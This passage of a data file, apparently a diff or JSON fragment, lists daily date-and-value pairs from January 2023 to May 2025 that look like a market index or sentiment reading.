], + [ + "2023-01-06", + 46.51266985711849 + ], + [ + "2023-01-09", + 48.40478519460437 + ], + [ + "2023-01-10", + 50.868237105046816 + ], + [ + "2023-01-11", + 55.57618089666103 + ], + [ + "2023-01-12", + 56.98680555240386 + ], + [ + "2023-01-13", + 58.790601278858595 + ], + [ + "2023-01-17", + 59.33583059912842 + ], + [ + "2023-01-18", + 54.362452160881794 + ], + [ + "2023-01-19", + 50.93321203069328 + ], + [ + "2023-01-20", + 58.67626433880501 + ], + [ + "2023-01-23", + 63.80617749385446 + ], + [ + "2023-01-24", + 63.01470869710983 + ], + [ + "2023-01-25", + 62.11473817677507 + ], + [ + "2023-01-26", + 66.61602485422188 + ], + [ + "2023-01-27", + 68.70058586342962 + ], + [ + "2023-01-30", + 60.37251911773749 + ], + [ + "2023-01-31", + 63.804027081679884 + ], + [ + "2023-02-01", + 68.11094323748134 + ], + [ + "2023-02-02", + 73.85440413042718 + ], + [ + "2023-02-03", + 67.17110351903702 + ], + [ + "2023-02-06", + 64.24421967690824 + ], + [ + "2023-02-07", + 67.90223354691082 + ], + [ + "2023-02-08", + 61.925595557628 + ], + [ + "2023-02-09", + 59.18679218162841 + ], + [ + "2023-02-10", + 57.181930768454656 + ], + [ + "2023-02-13", + 60.660717362161314 + ], + [ + "2023-02-14", + 62.21059393340868 + ], + [ + "2023-02-15", + 63.814200350826155 + ], + [ + "2023-02-16", + 57.34630269542538 + ], + [ + "2023-02-17", + 55.12617721195765 + ], + [ + "2023-02-21", + 48.40268760360507 + ], + [ + "2023-02-22", + 48.610975440775995 + ], + [ + "2023-02-23", + 51.09445804123845 + ], + [ + "2023-02-24", + 46.422246464146006 + ], + [ + "2023-02-27", + 48.55274481490522 + ], + [ + "2023-02-28", + 48.17759960633357 + ], + [ + "2023-03-01", + 45.81046301354004 + ], + [ + "2023-03-02", + 48.588496209602 + ], + [ + "2023-03-03", + 54.86453857003865 + ], + [ + "2023-03-06", + 55.19450738523762 + ], + [ + "2023-03-07", + 50.86080771956715 + ], + [ + "2023-03-08", + 52.476920841314886 + ], + [ + "2023-03-09", + 46.7090749793464 + ], + [ + "2023-03-10", + 42.68481661543773 + ], + [ + "2023-03-13", + 45.32622829786643 + ], + [ + "2023-03-14", + 52.65999198160122 + ], + [ + "2023-03-15", + 54.20490993867937 + ], + [ + "2023-03-16", + 61.10904025432825 + ], + [ + "2023-03-17", + 59.33634884184083 + ], + [ + "2023-03-20", + 60.26406897431569 + ], + [ + "2023-03-21", + 63.85125826390986 + ], + [ + "2023-03-22", + 58.37121720865104 + ], + [ + "2023-03-23", + 61.437100488089094 + ], + [ + "2023-03-24", + 62.374428868134814 + ], + [ + "2023-03-27", + 59.466289586082006 + ], + [ + "2023-03-28", + 57.25295099161354 + ], + [ + "2023-03-29", + 62.399242924639466 + ], + [ + "2023-03-30", + 64.81076355855376 + ], + [ + "2023-03-31", + 68.65106100017778 + ], + [ + "2023-04-03", + 67.47283720539465 + ], + [ + "2023-04-04", + 65.78936892455737 + ], + [ + "2023-04-05", + 61.00793987067981 + ], + [ + "2023-04-06", + 62.96776446342667 + ], + [ + "2023-04-10", + 62.68110757971237 + ], + [ + "2023-04-11", + 59.3808843091341 + ], + [ + "2023-04-12", + 55.107497273309285 + ], + [ + "2023-04-13", + 61.63960702970068 + ], + [ + "2023-04-14", + 60.70850072349176 + ], + [ + "2023-04-17", + 60.994005253841415 + ], + [ + "2023-04-18", + 61.01657207395356 + ], + [ + "2023-04-19", + 60.73245273092706 + ], + [ + "2023-04-20", + 56.16816666193748 + ], + [ + "2023-04-21", + 56.644569488822114 + ], + [ + "2023-04-24", + 55.34856081171903 + ], + [ + "2023-04-25", + 45.27446623193963 + ], + [ + "2023-04-26", + 48.46095934617203 + ], + [ + "2023-04-27", + 59.82493392350364 + ], + [ + "2023-04-28", + 62.16615926486629 + ], + [ + "2023-05-01", + 61.51969613887612 + ], + [ + "2023-05-02", + 56.6980112388611 + ], + [ + "2023-05-03", + 53.348841841887335 + ], + [ + "2023-05-04", + 51.59010380178492 + ], + [ + "2023-05-05", + 60.091196969186505 + ], + [ + "2023-05-08", + 60.969957092359486 + ], + [ + "2023-05-09", + 57.47754268445689 + ], + [ + "2023-05-10", + 61.52920415324113 + ], + [ + "2023-05-11", + 62.688742872351085 + ], + [ + "2023-05-12", + 60.52047395040278 + ], + [ + "2023-05-15", + 62.61524885683581 + ], + [ + "2023-05-16", + 63.05893668143468 + ], + [ + "2023-05-17", + 67.50470420528917 + ], + [ + "2023-05-18", + 72.94952782404089 + ], + [ + "2023-05-19", + 71.35829856248282 + ], + [ + "2023-05-22", + 72.32485135484006 + ], + [ + "2023-05-23", + 63.57367379038422 + ], + [ + "2023-05-24", + 60.42761285627297 + ], + [ + "2023-05-25", + 68.38011291206261 + ], + [ + "2023-05-26", + 74.35068820561477 + ], + [ + "2023-05-30", + 75.26622565479227 + ], + [ + "2023-05-31", + 71.79032328460328 + ], + [ + "2023-06-01", + 74.36564152266696 + ], + [ + "2023-06-02", + 75.92025097228266 + ], + [ + "2023-06-05", + 76.06829923870491 + ], + [ + "2023-06-06", + 75.94775166944105 + ], + [ + "2023-06-07", + 64.83534282979926 + ], + [ + "2023-06-08", + 68.41507057497061 + ], + [ + "2023-06-09", + 69.45896210323505 + ], + [ + "2023-06-12", + 73.6242969648664 + ], + [ + "2023-06-13", + 75.30186854243753 + ], + [ + "2023-06-14", + 76.81535820428377 + ], + [ + "2023-06-15", + 79.09391126310062 + ], + [ + "2023-06-16", + 74.85973128998009 + ], + [ + "2023-06-20", + 73.89667158152716 + ], + [ + "2023-06-21", + 65.29731568654937 + ], + [ + "2023-06-22", + 68.65231522627606 + ], + [ + "2023-06-23", + 63.07013669889166 + ], + [ + "2023-06-26", + 56.451640047381616 + ], + [ + "2023-06-27", + 61.900077039037015 + ], + [ + "2023-06-28", + 62.48368633075111 + ], + [ + "2023-06-29", + 61.44162359432375 + ], + [ + "2023-06-30", + 66.11796706382714 + ], + [ + "2023-07-03", + 66.79059466568211 + ], + [ + "2023-07-05", + 66.77415536075148 + ], + [ + "2023-07-06", + 62.13795785862913 + ], + [ + "2023-07-07", + 60.19088414094881 + ], + [ + "2023-07-10", + 60.32254970679569 + ], + [ + "2023-07-11", + 62.34596458036912 + ], + [ + "2023-07-12", + 67.00175725767984 + ], + [ + "2023-07-13", + 72.06536972592636 + ], + [ + "2023-07-14", + 71.91507316322114 + ], + [ + "2023-07-17", + 74.4524214488008 + ], + [ + "2023-07-18", + 76.47617151972103 + ], + [ + "2023-07-19", + 76.2888959512527 + ], + [ + "2023-07-20", + 60.53303908352041 + ], + [ + "2023-07-21", + 58.86866878205491 + ], + [ + "2023-07-24", + 59.50528823398816 + ], + [ + "2023-07-25", + 62.18423571384148 + ], + [ + "2023-07-26", + 60.0696692764363 + ], + [ + "2023-07-27", + 58.538378682409636 + ], + [ + "2023-07-28", + 65.7129343793647 + ], + [ + "2023-07-31", + 65.8982331451813 + ], + [ + "2023-08-01", + 64.23483496822894 + ], + [ + "2023-08-02", + 51.119173006875506 + ], + [ + "2023-08-03", + 50.32871992303389 + ], + [ + "2023-08-04", + 47.99742563452698 + ], + [ + "2023-08-07", + 52.28221015757747 + ], + [ + "2023-08-08", + 47.97145629870437 + ], + [ + "2023-08-09", + 43.06850811843691 + ], + [ + "2023-08-10", + 44.09154317639943 + ], + [ + "2023-08-11", + 41.32746777816426 + ], + [ + "2023-08-14", + 47.52363385603185 + ], + [ + "2023-08-15", + 42.86239566228886 + ], + [ + "2023-08-16", + 38.81472430249196 + ], + [ + "2023-08-17", + 35.164641294360905 + ], + [ + "2023-08-18", + 34.76458651536119 + ], + [ + "2023-08-21", + 43.621579455833185 + ], + [ + "2023-08-22", + 43.0542978013392 + ], + [ + "2023-08-23", + 50.6680077571776 + ], + [ + "2023-08-24", + 42.28446794095209 + ], + [ + "2023-08-25", + 45.71707464457785 + ], + [ + "2023-08-28", + 48.918682378747235 + ], + [ + "2023-08-29", + 56.91821527084046 + ], + [ + "2023-08-30", + 58.734061830649715 + ], + [ + "2023-08-31", + 59.72262889604455 + ], + [ + "2023-09-01", + 59.18217340456803 + ], + [ + "2023-09-05", + 59.65399333053452 + ], + [ + "2023-09-06", + 54.91178475036096 + ], + [ + "2023-09-07", + 51.37236919584558 + ], + [ + "2023-09-08", + 52.01856287909647 + ], + [ + "2023-09-11", + 57.191060390966584 + ], + [ + "2023-09-12", + 51.49846430124769 + ], + [ + "2023-09-13", + 53.20258355135695 + ], + [ + "2023-09-14", + 56.73072764486016 + ], + [ + "2023-09-15", + 48.42969788166809 + ], + [ + "2023-09-18", + 48.911425209620305 + ], + [ + "2023-09-19", + 47.924692689074575 + ], + [ + "2023-09-20", + 41.79815397132997 + ], + [ + "2023-09-21", + 35.6474328516139 + ], + [ + "2023-09-22", + 35.72379812569382 + ], + [ + "2023-09-25", + 38.3960349765094 + ], + [ + "2023-09-26", + 33.615063169896985 + ], + [ + "2023-09-27", + 34.95583726909274 + ], + [ + "2023-09-28", + 39.652147728078475 + ], + [ + "2023-09-29", + 40.0601161812558 + ], + [ + "2023-10-02", + 44.69119380919945 + ], + [ + "2023-10-03", + 37.98888666341164 + ], + [ + "2023-10-04", + 44.7828362597617 + ], + [ + "2023-10-05", + 43.65250757407989 + ], + [ + "2023-10-06", + 51.176861944440866 + ], + [ + "2023-10-09", + 53.25723381273657 + ], + [ + "2023-10-10", + 55.486530891123024 + ], + [ + "2023-10-11", + 58.263738531237784 + ], + [ + "2023-10-12", + 56.404890728451 + ], + [ + "2023-10-13", + 50.18882358324861 + ], + [ + "2023-10-16", + 54.93871255593134 + ], + [ + "2023-10-17", + 53.33411281648637 + ], + [ + "2023-10-18", + 47.384584554827505 + ], + [ + "2023-10-19", + 43.68984934482881 + ], + [ + "2023-10-20", + 38.57406607808045 + ], + [ + "2023-10-23", + 40.07956341961621 + ], + [ + "2023-10-24", + 44.79187016123559 + ], + [ + "2023-10-25", + 36.86097210325162 + ], + [ + "2023-10-26", + 32.19563523974675 + ], + [ + "2023-10-27", + 34.40400300035927 + ], + [ + "2023-10-30", + 39.41425447025505 + ], + [ + "2023-10-31", + 41.48067343724544 + ], + [ + "2023-11-01", + 48.393442834153824 + ], + [ + "2023-11-02", + 54.54616383885684 + ], + [ + "2023-11-03", + 58.09179760617107 + ], + [ + "2023-11-06", + 59.293032018422736 + ], + [ + "2023-11-07", + 62.02086533407217 + ], + [ + "2023-11-08", + 62.20836013655812 + ], + [ + "2023-11-09", + 58.488900935845884 + ], + [ + "2023-11-10", + 65.01866126192593 + ], + [ + "2023-11-13", + 63.49327417934371 + ], + [ + "2023-11-14", + 68.90056494184684 + ], + [ + "2023-11-15", + 69.07670359284391 + ], + [ + "2023-11-16", + 69.28996632437587 + ], + [ + "2023-11-17", + 69.35193865393735 + ], + [ + "2023-11-20", + 72.47943346520145 + ], + [ + "2023-11-21", + 68.82638541704654 + ], + [ + "2023-11-22", + 69.96816192867125 + ], + [ + "2023-11-24", + 69.02641748033247 + ], + [ + "2023-11-27", + 68.41340045853471 + ], + [ + "2023-11-28", + 69.29446196046858 + ], + [ + "2023-11-29", + 68.52751333144452 + ], + [ + "2023-11-30", + 66.48394768025302 + ], + [ + "2023-12-01", + 67.66032862770112 + ], + [ + "2023-12-04", + 60.23511150132519 + ], + [ + "2023-12-05", + 61.455729640711 + ], + [ + "2023-12-06", + 57.09706860053156 + ], + [ + "2023-12-07", + 63.74747963706617 + ], + [ + "2023-12-08", + 65.60454479402652 + ], + [ + "2023-12-11", + 68.90689589485149 + ], + [ + "2023-12-12", + 71.66198620203389 + ], + [ + "2023-12-13", + 75.43487372646774 + ], + [ + "2023-12-14", + 74.6957015771066 + ], + [ + "2023-12-15", + 76.10107803112777 + ], + [ + "2023-12-18", + 77.83674037791721 + ], + [ + "2023-12-19", + 79.16685758865209 + ], + [ + "2023-12-20", + 66.58721039497699 + ], + [ + "2023-12-21", + 70.48345229881262 + ], + [ + "2023-12-22", + 70.95781130594544 + ], + [ + "2023-12-26", + 72.881339351223 + ], + [ + "2023-12-27", + 73.51343414746897 + ], + [ + "2023-12-28", + 73.07453910215156 + ], + [ + "2023-12-29", + 69.12021737322758 + ], + [ + "2024-01-02", + 56.33733475307462 + ], + [ + "2024-01-03", + 50.192422514627346 + ], + [ + "2024-01-04", + 47.50701917331054 + ], + [ + "2024-01-05", + 48.19138164101967 + ], + [ + "2024-01-08", + 58.385403362888376 + ], + [ + "2024-01-09", + 59.22830059749382 + ], + [ + "2024-01-10", + 62.07215391020768 + ], + [ + "2024-01-11", + 62.93279938943983 + ], + [ + "2024-01-12", + 63.15521973892336 + ], + [ + "2024-01-16", + 63.07761973972033 + ], + [ + "2024-01-17", + 58.59697702617771 + ], + [ + "2024-01-18", + 65.24858683905444 + ], + [ + "2024-01-19", + 72.09050095985023 + ], + [ + "2024-01-22", + 72.48236010709994 + ], + [ + "2024-01-23", + 73.7453183478292 + ], + [ + "2024-01-24", + 75.37947790051074 + ], + [ + "2024-01-25", + 75.73934336461409 + ], + [ + "2024-01-26", + 70.33203795994957 + ], + [ + "2024-01-29", + 73.77698559445525 + ], + [ + "2024-01-30", + 68.1782691454419 + ], + [ + "2024-01-31", + 55.032957922978056 + ], + [ + "2024-02-01", + 59.936363004350994 + ], + [ + "2024-02-02", + 65.77303258419441 + ], + [ + "2024-02-05", + 64.97249022898725 + ], + [ + "2024-02-06", + 63.69020397364188 + ], + [ + "2024-02-07", + 67.25108246304345 + ], + [ + "2024-02-08", + 67.86807709078735 + ], + [ + "2024-02-09", + 71.00118708082297 + ], + [ + "2024-02-12", + 68.12941882847439 + ], + [ + "2024-02-13", + 58.08345589259423 + ], + [ + "2024-02-14", + 62.21070347838744 + ], + [ + "2024-02-15", + 63.28609229640361 + ], + [ + "2024-02-16", + 57.86948099549108 + ], + [ + "2024-02-20", + 53.78039645904487 + ], + [ + "2024-02-21", + 51.71003883332666 + ], + [ + "2024-02-22", + 62.91328923367504 + ], + [ + "2024-02-23", + 61.32690060699859 + ], + [ + "2024-02-26", + 61.03134006847162 + ], + [ + "2024-02-27", + 61.93308727560958 + ], + [ + "2024-02-28", + 58.68778159151063 + ], + [ + "2024-02-29", + 62.11059658449246 + ], + [ + "2024-03-01", + 67.28366762532684 + ], + [ + "2024-03-04", + 64.98523015366322 + ], + [ + "2024-03-05", + 54.86765906866591 + ], + [ + "2024-03-06", + 57.327431931312375 + ], + [ + "2024-03-07", + 62.65513305551805 + ], + [ + "2024-03-08", + 55.45631413624526 + ], + [ + "2024-03-11", + 53.76970116694812 + ], + [ + "2024-03-12", + 58.942377763515864 + ], + [ + "2024-03-13", + 55.31728812051923 + ], + [ + "2024-03-14", + 54.14982386464638 + ], + [ + "2024-03-15", + 48.920907272380944 + ], + [ + "2024-03-18", + 52.81139949861394 + ], + [ + "2024-03-19", + 53.810581857737226 + ], + [ + "2024-03-20", + 58.342290241904244 + ], + [ + "2024-03-21", + 60.04712852385533 + ], + [ + "2024-03-22", + 60.47024421347862 + ], + [ + "2024-03-25", + 58.35626185414158 + ], + [ + "2024-03-26", + 56.46652007513012 + ], + [ + "2024-03-27", + 58.00227813359762 + ], + [ + "2024-03-28", + 56.82985364008938 + ], + [ + "2024-04-01", + 57.88094655299536 + ], + [ + "2024-04-02", + 52.28093512030783 + ], + [ + "2024-04-03", + 53.529256848239925 + ], + [ + "2024-04-04", + 44.89352579223541 + ], + [ + "2024-04-05", + 51.31271518925876 + ], + [ + "2024-04-08", + 51.467016432394225 + ], + [ + "2024-04-09", + 53.458520765015926 + ], + [ + "2024-04-10", + 48.39416861328951 + ], + [ + "2024-04-11", + 56.451223667697406 + ], + [ + "2024-04-12", + 48.22674826863017 + ], + [ + "2024-04-15", + 41.59883264917319 + ], + [ + "2024-04-16", + 41.64669201461418 + ], + [ + "2024-04-17", + 37.311625536203906 + ], + [ + "2024-04-18", + 35.47453289163896 + ], + [ + "2024-04-19", + 29.781719858743998 + ], + [ + "2024-04-22", + 35.11926037546051 + ], + [ + "2024-04-23", + 42.2097849888688 + ], + [ + "2024-04-24", + 43.735381236647356 + ], + [ + "2024-04-25", + 42.026112063494345 + ], + [ + "2024-04-26", + 48.86884314487037 + ], + [ + "2024-04-29", + 50.54819780527119 + ], + [ + "2024-04-30", + 43.39150869227123 + ], + [ + "2024-05-01", + 41.03744846184482 + ], + [ + "2024-05-02", + 46.513732516505456 + ], + [ + "2024-05-03", + 53.87189812682644 + ], + [ + "2024-05-06", + 57.38207255161905 + ], + [ + "2024-05-07", + 57.43326806178826 + ], + [ + "2024-05-08", + 57.15864018509917 + ], + [ + "2024-05-09", + 57.95798136489215 + ], + [ + "2024-05-10", + 58.85373170569255 + ], + [ + "2024-05-13", + 59.75919854448278 + ], + [ + "2024-05-14", + 62.25850252990958 + ], + [ + "2024-05-15", + 67.56433302336502 + ], + [ + "2024-05-16", + 66.24062178132186 + ], + [ + "2024-05-17", + 65.90807219118014 + ], + [ + "2024-05-20", + 68.35742351606066 + ], + [ + "2024-05-21", + 69.03436613027596 + ], + [ + "2024-05-22", + 68.87391040608276 + ], + [ + "2024-05-23", + 65.15883844070873 + ], + [ + "2024-05-24", + 68.93520886751904 + ], + [ + "2024-05-28", + 70.33170744986994 + ], + [ + "2024-05-29", + 64.48488428205454 + ], + [ + "2024-05-30", + 56.80894244206901 + ], + [ + "2024-05-31", + 55.5848841393662 + ], + [ + "2024-06-03", + 58.36792344341043 + ], + [ + "2024-06-04", + 59.75930590340423 + ], + [ + "2024-06-05", + 68.21115838497225 + ], + [ + "2024-06-06", + 67.94277213134765 + ], + [ + "2024-06-07", + 67.21278095342318 + ], + [ + "2024-06-10", + 68.85623158336529 + ], + [ + "2024-06-11", + 71.48226296472873 + ], + [ + "2024-06-12", + 75.71909843500968 + ], + [ + "2024-06-13", + 77.24545589711249 + ], + [ + "2024-06-14", + 78.63549941954128 + ], + [ + "2024-06-17", + 81.52416460999481 + ], + [ + "2024-06-18", + 81.59265784728457 + ], + [ + "2024-06-20", + 74.20633014265735 + ], + [ + "2024-06-21", + 71.79205913002438 + ], + [ + "2024-06-24", + 62.511113617430205 + ], + [ + "2024-06-25", + 67.0644770440398 + ], + [ + "2024-06-26", + 67.83303428630146 + ], + [ + "2024-06-27", + 68.81460490072021 + ], + [ + "2024-06-28", + 64.53855346060614 + ], + [ + "2024-07-01", + 67.01922658455116 + ], + [ + "2024-07-02", + 70.95883475820615 + ], + [ + "2024-07-03", + 73.67589275338332 + ], + [ + "2024-07-05", + 76.64360414675286 + ], + [ + "2024-07-08", + 77.27935436451821 + ], + [ + "2024-07-09", + 77.51948512324132 + ], + [ + "2024-07-10", + 80.23481283592247 + ], + [ + "2024-07-11", + 62.85799734386497 + ], + [ + "2024-07-12", + 64.99706147074534 + ], + [ + "2024-07-15", + 65.96839406505175 + ], + [ + "2024-07-16", + 66.11308872088787 + ], + [ + "2024-07-17", + 48.933791966646574 + ], + [ + "2024-07-18", + 46.880893097190246 + ], + [ + "2024-07-19", + 43.23935563663465 + ], + [ + "2024-07-22", + 50.181697328216174 + ], + [ + "2024-07-23", + 48.643234387634664 + ], + [ + "2024-07-24", + 36.44187656298065 + ], + [ + "2024-07-25", + 33.74036514072827 + ], + [ + "2024-07-26", + 38.27292803172955 + ], + [ + "2024-07-29", + 39.15983591881432 + ], + [ + "2024-07-30", + 35.40738403540972 + ], + [ + "2024-07-31", + 47.02693226552062 + ], + [ + "2024-08-01", + 40.427122919372636 + ], + [ + "2024-08-02", + 35.32255294996156 + ], + [ + "2024-08-05", + 30.27395646148001 + ], + [ + "2024-08-06", + 33.45842445015407 + ], + [ + "2024-08-07", + 31.67576078079108 + ], + [ + "2024-08-08", + 41.11607815086411 + ], + [ + "2024-08-09", + 42.618303073826574 + ], + [ + "2024-08-12", + 43.264458861414504 + ], + [ + "2024-08-13", + 50.232839439075796 + ], + [ + "2024-08-14", + 50.32083530685589 + ], + [ + "2024-08-15", + 56.74108253154297 + ], + [ + "2024-08-16", + 57.05296617594595 + ], + [ + "2024-08-19", + 60.213144654904525 + ], + [ + "2024-08-20", + 59.45061804362807 + ], + [ + "2024-08-21", + 60.64108806221516 + ], + [ + "2024-08-22", + 54.73136742491026 + ], + [ + "2024-08-23", + 57.71867200370042 + ], + [ + "2024-08-26", + 54.231277140876934 + ], + [ + "2024-08-27", + 55.12113061820872 + ], + [ + "2024-08-28", + 51.04895958272212 + ], + [ + "2024-08-29", + 50.53618389900971 + ], + [ + "2024-08-30", + 54.53499987881783 + ], + [ + "2024-09-03", + 44.53996803152615 + ], + [ + "2024-09-04", + 43.822158240671506 + ], + [ + "2024-09-05", + 44.169362900972416 + ], + [ + "2024-09-06", + 37.08074760262911 + ], + [ + "2024-09-09", + 41.78176816372245 + ], + [ + "2024-09-10", + 45.002899428711 + ], + [ + "2024-09-11", + 51.81190474532743 + ], + [ + "2024-09-12", + 54.60712865721613 + ], + [ + "2024-09-13", + 55.87739323635531 + ], + [ + "2024-09-16", + 54.25765902458302 + ], + [ + "2024-09-17", + 54.42704453808028 + ], + [ + "2024-09-18", + 52.70386313439909 + ], + [ + "2024-09-19", + 60.52924280711457 + ], + [ + "2024-09-20", + 59.7080999460413 + ], + [ + "2024-09-23", + 60.51001453894033 + ], + [ + "2024-09-24", + 61.9962844981237 + ], + [ + "2024-09-25", + 62.29147886481281 + ], + [ + "2024-09-26", + 64.68727892977998 + ], + [ + "2024-09-27", + 61.548943815848425 + ], + [ + "2024-09-30", + 62.49976293497541 + ], + [ + "2024-10-01", + 54.95999004571277 + ], + [ + "2024-10-02", + 55.53762221050354 + ], + [ + "2024-10-03", + 55.134523759166385 + ], + [ + "2024-10-04", + 60.099206859377595 + ], + [ + "2024-10-07", + 54.2136790968714 + ], + [ + "2024-10-08", + 60.02824018852724 + ], + [ + "2024-10-09", + 62.75217007982008 + ], + [ + "2024-10-10", + 62.08938937385347 + ], + [ + "2024-10-11", + 62.673149802782724 + ], + [ + "2024-10-14", + 65.72887991603328 + ], + [ + "2024-10-15", + 57.57557266568038 + ], + [ + "2024-10-16", + 57.62663096195117 + ], + [ + "2024-10-17", + 57.9356289688026 + ], + [ + "2024-10-18", + 60.847859273082896 + ], + [ + "2024-10-21", + 61.69053000823643 + ], + [ + "2024-10-22", + 62.188714129826714 + ], + [ + "2024-10-23", + 51.94945373452485 + ], + [ + "2024-10-24", + 56.01337858626859 + ], + [ + "2024-10-25", + 58.852606684690386 + ], + [ + "2024-10-28", + 58.928717549386185 + ], + [ + "2024-10-29", + 63.281950356838834 + ], + [ + "2024-10-30", + 58.02253732622756 + ], + [ + "2024-10-31", + 44.74671459175883 + ], + [ + "2024-11-01", + 48.38075550659752 + ], + [ + "2024-11-04", + 47.05868393375581 + ], + [ + "2024-11-05", + 53.08672282530716 + ], + [ + "2024-11-06", + 62.89758143881136 + ], + [ + "2024-11-07", + 67.28423738000247 + ], + [ + "2024-11-08", + 67.5952641163002 + ], + [ + "2024-11-11", + 67.25101570363073 + ], + [ + "2024-11-12", + 66.12666169790938 + ], + [ + "2024-11-13", + 65.29252674072882 + ], + [ + "2024-11-14", + 60.834530005124 + ], + [ + "2024-11-15", + 48.65471313502304 + ], + [ + "2024-11-18", + 51.62376409156329 + ], + [ + "2024-11-19", + 54.45204148426694 + ], + [ + "2024-11-20", + 54.1645405408955 + ], + [ + "2024-11-21", + 55.73538901457083 + ], + [ + "2024-11-22", + 56.4545996437362 + ], + [ + "2024-11-25", + 57.194332843758524 + ], + [ + "2024-11-26", + 59.701090286408935 + ], + [ + "2024-11-27", + 54.622463627547255 + ], + [ + "2024-11-29", + 58.801433030215286 + ], + [ + "2024-12-02", + 63.34549565231351 + ], + [ + "2024-12-03", + 64.54447001325187 + ], + [ + "2024-12-04", + 68.96568139125804 + ], + [ + "2024-12-05", + 66.92628216916376 + ], + [ + "2024-12-06", + 70.00293862792317 + ], + [ + "2024-12-09", + 64.34375167071337 + ], + [ + "2024-12-10", + 62.00038235663576 + ], + [ + "2024-12-11", + 68.4746090175247 + ], + [ + "2024-12-12", + 64.15510000533672 + ], + [ + "2024-12-13", + 66.81188551007997 + ], + [ + "2024-12-16", + 71.1738751548614 + ], + [ + "2024-12-17", + 68.18030885790454 + ], + [ + "2024-12-18", + 49.78667382457302 + ], + [ + "2024-12-19", + 48.12313014072016 + ], + [ + "2024-12-20", + 51.528193981175924 + ], + [ + "2024-12-23", + 55.100044409312645 + ], + [ + "2024-12-24", + 59.60505323036322 + ], + [ + "2024-12-26", + 59.27982044179646 + ], + [ + "2024-12-27", + 53.16990327096619 + ], + [ + "2024-12-30", + 47.91891631464818 + ], + [ + "2024-12-31", + 44.90892920550574 + ], + [ + "2025-01-02", + 44.22584440400436 + ], + [ + "2025-01-03", + 50.93632886056615 + ], + [ + "2025-01-06", + 55.089735986418695 + ], + [ + "2025-01-07", + 48.19016731266577 + ], + [ + "2025-01-08", + 48.25737410452221 + ], + [ + "2025-01-10", + 42.88676724415674 + ], + [ + "2025-01-13", + 41.87436769549793 + ], + [ + "2025-01-14", + 41.563196481964205 + ], + [ + "2025-01-15", + 51.0467598548529 + ], + [ + "2025-01-16", + 48.41094772579486 + ], + [ + "2025-01-17", + 54.4678999185335 + ], + [ + "2025-01-21", + 56.41518852932341 + ], + [ + "2025-01-22", + 60.41317957245744 + ], + [ + "2025-01-23", + 61.06095730284739 + ], + [ + "2025-01-24", + 58.32320084786043 + ], + [ + "2025-01-27", + 46.7571972322463 + ], + [ + "2025-01-28", + 51.827710054243546 + ], + [ + "2025-01-29", + 51.15120928503292 + ], + [ + "2025-01-30", + 52.65866191066245 + ], + [ + "2025-01-31", + 52.06632302122106 + ], + [ + "2025-02-03", + 48.81389834687045 + ], + [ + "2025-02-04", + 53.56664591035979 + ], + [ + "2025-02-05", + 55.24146983833616 + ], + [ + "2025-02-06", + 57.16407090763154 + ], + [ + "2025-02-07", + 51.38955429142158 + ], + [ + "2025-02-10", + 55.932370077760616 + ], + [ + "2025-02-11", + 54.83386536826361 + ], + [ + "2025-02-12", + 55.06767651635808 + ], + [ + "2025-02-13", + 60.470464684109665 + ], + [ + "2025-02-14", + 61.92989716824217 + ], + [ + "2025-02-18", + 62.733315872007175 + ], + [ + "2025-02-19", + 62.83720054632814 + ], + [ + "2025-02-20", + 60.08446193888065 + ], + [ + "2025-02-21", + 48.86082576077401 + ], + [ + "2025-02-24", + 43.93804944016803 + ], + [ + "2025-02-25", + 39.42602881205738 + ], + [ + "2025-02-26", + 40.668129240529595 + ], + [ + "2025-02-27", + 32.41776041298817 + ], + [ + "2025-02-28", + 39.70081601404467 + ], + [ + "2025-03-03", + 34.12603105331462 + ], + [ + "2025-03-04", + 33.443818317025915 + ], + [ + "2025-03-05", + 39.091053429759626 + ], + [ + "2025-03-06", + 32.70284580659708 + ], + [ + "2025-03-07", + 35.64698855715588 + ], + [ + "2025-03-10", + 28.51456141287018 + ], + [ + "2025-03-11", + 28.154863552860704 + ], + [ + "2025-03-12", + 32.47342169215655 + ], + [ + "2025-03-13", + 29.403685789813792 + ], + [ + "2025-03-14", + 37.76289280537129 + ], + [ + "2025-03-17", + 39.869437012718606 + ], + [ + "2025-03-18", + 36.361950205885414 + ], + [ + "2025-03-19", + 40.69697993484526 + ], + [ + "2025-03-20", + 39.94478064495168 + ], + [ + "2025-03-21", + 41.0815613718994 + ], + [ + "2025-03-24", + 48.141481928223584 + ], + [ + "2025-03-25", + 49.86091243891479 + ], + [ + "2025-03-26", + 44.68652802527699 + ], + [ + "2025-03-27", + 43.21837399999893 + ], + [ + "2025-03-28", + 37.17538752016508 + ], + [ + "2025-03-31", + 37.16656293161344 + ], + [ + "2025-04-01", + 40.0633645762277 + ], + [ + "2025-04-02", + 42.66156250776383 + ], + [ + "2025-04-03", + 31.72043946438751 + ], + [ + "2025-04-04", + 24.33893622574918 + ], + [ + "2025-04-07", + 25.023647255465463 + ], + [ + "2025-04-08", + 23.323293129875765 + ], + [ + "2025-04-09", + 48.15487701677749 + ], + [ + "2025-04-10", + 42.29996198516233 + ], + [ + "2025-04-11", + 45.27192082243207 + ], + [ + "2025-04-14", + 46.38625294647347 + ], + [ + "2025-04-15", + 46.580195292823454 + ], + [ + "2025-04-16", + 42.135116836140625 + ], + [ + "2025-04-17", + 42.1100455686823 + ], + [ + "2025-04-21", + 38.70327666825923 + ], + [ + "2025-04-22", + 43.7715439967059 + ], + [ + "2025-04-23", + 47.885553998380594 + ], + [ + "2025-04-24", + 52.62228094636874 + ], + [ + "2025-04-25", + 54.4388957336636 + ], + [ + "2025-04-28", + 54.37425948666285 + ], + [ + "2025-04-29", + 55.55640737572727 + ], + [ + "2025-04-30", + 55.52659123283453 + ], + [ + "2025-05-01", + 58.035111211627544 + ], + [ + "2025-05-02", + 60.77825193651295 + ], + [ + "2025-05-05", + 59.09107557672702 + ], + [ + "2025-05-06", + 56.460348645271964 + ], + [ + "2025-05-07", + 57.31604721620761 + ], + [ + "2025-05-08", + 59.57505634203114 + ], + [ + "2025-05-09", + 59.3581287519514 + ], + [ + "2025-05-12", + 67.32030074299558 + ], + [ + "2025-05-13", + 69.80092704111395 + ], + [ + "2025-05-14", + 70.75531682783259 + ], + [ + "2025-05-15", + 70.93775952362284 + ], + [ + "2025-05-16", + 71.69192715434001 + ], + [ + "2025-05-19", + 71.86585618489153 + ], + [ + "2025-05-20", + 70.2481784965622 + ], + [ + "2025-05-21", + 63.819883101062466 + ], + [ + "2025-05-22", + 64.28720947902968 + ], + [ + "2025-05-23", + 60.13941503591427 + ], + [ + "2025-05-27", + 66.07240695883281 + ], + [ + "2025-05-28", + 64.09150120076907 + ], + [ + "2025-05-29", + 64.59624342607937 + ], + [ + 